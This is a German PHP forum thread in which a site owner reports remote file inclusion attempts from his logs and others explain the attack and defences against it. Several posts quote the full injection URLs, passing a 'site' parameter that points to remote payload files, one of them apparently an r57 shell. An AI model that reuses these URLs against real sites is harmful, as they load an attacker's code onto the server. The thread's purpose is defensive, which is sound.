Ankündigung

Einklappen
Keine Ankündigung bisher.

Spionageversuch? Code-Injection?

Einklappen

Neue Werbung 2019

Einklappen
X
Einklappen
  • Seite von 2
  • Filter
  • Zeit
  • Anzeigen
Alles löschen
neue Beiträge
Vorherige 1 2 Weiter
  • #1

    Spionageversuch? Code-Injection?

    Hallo,

    habe gerade in meiner Logfile was gefunden was ich irgendwie merkwürdig finde.

    Mehrmals wurde meine Seite mit komischen Argumenten aufgerufen:

    http://www. ... .de/index.php?site=http://n0ne.net/id.txt?

    Die Variable site existiert ja wirklich auf meiner Seite. In der angegebenen Textfile befindet sich php-Code (hier).

    Was würde dieser Code bewirken? Sieht doch sehr kryptisch aus

    Wird der Inhalt solch einer Textdatei überhaupt in die Variable übernommen oder nur die Adresse?

    Im Prinzip kann ja so jeder beliebige Code in mein PHP-Skript eingeschleust werden, vorausgesetzt ich überprüfe nicht alle Variablen vor der Verwendung auf Plausibilität.

    Gibt es eine einfache Möglichkeit, sowas zu verhindern?
    Stichworte: -
  • #2
    Blick da auch gerade nicht durch, sieht etwas sinnlos aus, kenn aber die Linux-Konsole nicht. Auf jeden Fall probiert er alles aus, was PHP an Funktionen hergibt, die direkt auf die Betriebssystem-Konsole zugreifen. Wahrscheinlich will er Infos über deinen Server sammeln um ihn dann später zu übernehmen.

    Wird der Inhalt solch einer Textdatei überhaupt in die Variable übernommen oder nur die Adresse?
    Er spekuliert darauf, dass du $_GET["site"] direkt mit require/include öffnest, dann hätte er den PHP-Code bei dir eingeschleust.

    Ein Grund mehr zu verschleiern, dass die serverseitige Skriptsprache PHP ist und jede vom Client manipulierbare Variable gegenzuchecken.

    Kommentar

    • #3
      Hmm...ok, eine Variable ungeprüft als include einzubinden wäre auch etwas dämlich

      Aber mal angenommen der Code würde im Klartext, halt in einer Zeile übergeben werden. D.h. meine Variable "site" hätte PHP-Code als Inhalt.

      Würde es überhaupt eine Möglichkeit geben, dass der Code ausgeführt wird? Ich mein solang ich ihn als Argument an Funktionen z.B. zur Stringbearbeitung übergebe dürfte doch nichts passieren, oder?

      Lediglich HTML-Code könnte bei der Ausgabe kritisch werden, oder MySQL-Operationen könnten missbraucht werden, aber wie PHP-Code ausgeführt werden sollte kann ich mir grad nicht vorstellen (ausser include oder require). Oder hab ich grad nen Blackout

      Aber sowas würde doch auf jeden Fall Abhilfe schaffen oder?
      PHP-Code:
      $site strip_tags($_GET["site"]); 

      Kommentar

      • #4
        Hmm...ok, eine Variable ungeprüft als include einzubinden wäre auch etwas dämlich
        Ja, aber es klappt oft genug, sonst würde sich der Hacker nicht die Mühe machen.


        PHP-Code wird nur bei include/require oder eval ausgeführt.
        HTML-Code überall da, wo kein strip_tags(), htmlspecialchars() oder htmlentities() auf einen vom Client stammenden Input, der in die Website eingebunden wird, ausgeführt wurde.
        Für MySQL-Werte verwendeter Input sollte mit mysql_real_escape_string() abgesichert werden und nicht nur mit addslashes().

        Korrigiert mich, wenn ich eine Funktion oder Möglichkeit vergessen habe.
        Natürlich ist Schadcodeausführung auch über PHP-Bugs möglich, darauf hat der Programmierer aber keinen Einfluß.

        Kommentar

        • #5
          Hmm, sollte meine Logdatei öfter anschauen. Sowas ähnliches gabs schonmal vor paar wochen. Damals aber von ner Russischen seite aus (oder so...)

          http://badmus.by.ru/id.txt?

          Ist wohl ein Zeichen dafür dass meine Seite in Google gut dabei ist. Ansonsten wüsste ich nicht wie diese Leute gerade auf eine kleine unbedeutende private Homepage kommen

          Kommentar

          • #6
            Hallo saibot,

            wie Zergling schon sagte funktioniert das oft genug und die Jungs versuchen nicht einfach nur deine Seite zu übernehmen, sondern denen geht es um die Maschine. Da sind shared hosting-Server ein recht beliebtes Ziel. Ist die Maschine einmal in deren Gewalt wird diese so modifiziert, dass diese beispielsweise zu einem Bot-Netzwerk oder einem DOS-Netzwerk zusammengefasst werden.

            Kommentar

            • #7
              Aha, so macht das ganze "Sinn". Naja..da bin ich doch mal froh dass ich mich nicht um den Server kümmern muss

              Kommentar

              • #8
                Zitat von saibot
                Hmm...ok, eine Variable ungeprüft als include einzubinden wäre auch etwas dämlich
                Kommt gerade bei Anfängern oft genug vor und es gibt auch immer wieder Systeme die sowas aufgreifen. Hab auf meiner Seite sowas sehr regelmäßig mittlerweile in den Logs, obwohl sie in keinster form dynamische Parameter hat, das sind oftmals einfach nur Bots die alle möglichen seiten abklappern und es versuchen.

                Kommentar

                • #9
                  Zitat von robo47
                  das sind oftmals einfach nur Bots die alle möglichen seiten abklappern und es versuchen.
                  Ja leider, der nächste war grad eben da: http://www.new-scam.com/r57.txt?

                  Der Code ist mächtig lang, hab ihn nicht ganz angeschaut, aber er verschickt u.a. Mails.

                  Darf man solche Links hier überhaupt rein stellen?

                  Kommentar

                  • #10
                    lol der hat sogar nen copyright

                    Kommentar

                    • #11
                      Braucht man wohl um sich nen Namen in der Szene zu machen oder so

                      Kommentar

                      • #12
                        ist doch nicht so tragisch. das ist einfach ein Spiel von meinen landsleuten
                        ich finde Spiel sogar lustig http://quest.ghc.ru/

                        Kommentar

                        • #13
                          ich kann kein russisch

                          Kommentar

                          • #14
                            die seite ist in 2 sprachen geteilt.
                            links russisch und rechts der gleicher Inhalt auf englisch. -spiel ist eigentlich sehr ansteckend und lässt intuitiv die sicherheitslücken bei eigenen programmen zu entdecken. Ich habe gestern bei Aufgabe 3 richtig geschwitzt um ein zip-archive zu finden und danach noch 30 minuten um 5-stellen password von der Zip-datei zu knacken

                            Kommentar

                            • #15
                              Die Seite funktioniert nichtmehr, zumindest gerade nicht.

                              Gibt es irgendwie sowas wie eine Checkliste um die Sicherheit der Seite zu testen?

                              Kommentar

                              Vorherige 1 2 Weiter
                              Lädt...
                              X